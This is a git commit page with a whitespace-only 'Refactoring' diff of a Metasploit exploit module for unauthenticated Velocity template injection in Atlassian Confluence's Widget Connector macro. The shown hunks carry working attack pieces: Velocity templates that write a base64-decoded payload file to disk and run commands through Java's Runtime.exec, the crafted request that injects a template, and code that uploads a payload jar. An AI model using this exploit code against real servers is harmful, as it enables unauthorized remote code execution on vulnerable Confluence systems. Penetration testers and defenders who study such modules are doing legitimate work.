Refactoring
This commit is contained in:
rrockru
@@ -16,13 +16,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Name' => "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
|
||||
'Description' => %q{
|
||||
Widget Connector Macro is part of Atlassian Confluence Server and Data Center that
|
||||
allows embed online videos, slideshows, photostreams and more directly into page.
|
||||
A _template parameter can be used to inject remote Java code into a Velocity template,
|
||||
and gain code execution. Authentication is unrequired to exploit this vulnerability.
|
||||
By default, Java payload will be used because it is cross-platform, but you can also
|
||||
allows embed online videos, slideshows, photostreams and more directly into page.
|
||||
A _template parameter can be used to inject remote Java code into a Velocity template,
|
||||
and gain code execution. Authentication is unrequired to exploit this vulnerability.
|
||||
By default, Java payload will be used because it is cross-platform, but you can also
|
||||
specify which native payload you want (Linux or Windows).
|
||||
|
||||
Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
|
||||
Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
|
||||
6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.
|
||||
|
||||
This vulnerability was originally discovered by Daniil Dmitriev
|
||||
@@ -83,9 +83,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
when /javaprop\.vm$/
|
||||
conn.put(wrap(get_javaprop_vm()))
|
||||
when /upload\.vm$/
|
||||
conn.put(wrap(get_upload_vm()))
|
||||
conn.put(wrap(get_upload_vm()))
|
||||
when /exec\.vm$/
|
||||
conn.put(wrap(get_exec_vm()))
|
||||
conn.put(wrap(get_exec_vm()))
|
||||
else
|
||||
conn.put(wrap(get_dummy_vm()))
|
||||
end
|
||||
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
$i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
|
||||
EOF
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
# Returns a command execution template.
|
||||
#
|
||||
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()
|
||||
EOF
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
# Returns checking template.
|
||||
#
|
||||
@@ -166,9 +166,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
<<~EOF
|
||||
EOF
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
# Checks the vulnerability.
|
||||
# Checks the vulnerability.
|
||||
#
|
||||
# @return [Array] Check code
|
||||
def check
|
||||
@@ -203,10 +203,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'uri' => uri,
|
||||
'headers' => {
|
||||
'Accept' => '*/*',
|
||||
'Origin' => full_uri(vhost_uri: true)
|
||||
'Origin' => full_uri(vhost_uri: true)
|
||||
},
|
||||
'ctype' => 'application/json; charset=UTF-8',
|
||||
'data' => {
|
||||
'data' => {
|
||||
'contentId' => '1',
|
||||
'macro' => {
|
||||
'name' => 'widget',
|
||||
@@ -332,7 +332,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
fail_with(Failure::Unknown, 'Unable to get the temp path.')
|
||||
end
|
||||
|
||||
@fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
|
||||
@fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
|
||||
@b64 = Rex::Text.encode_base64(payload.encoded_jar)
|
||||
@command = ''
|
||||
|
||||
|
||||
Reference in New Issue
Block a user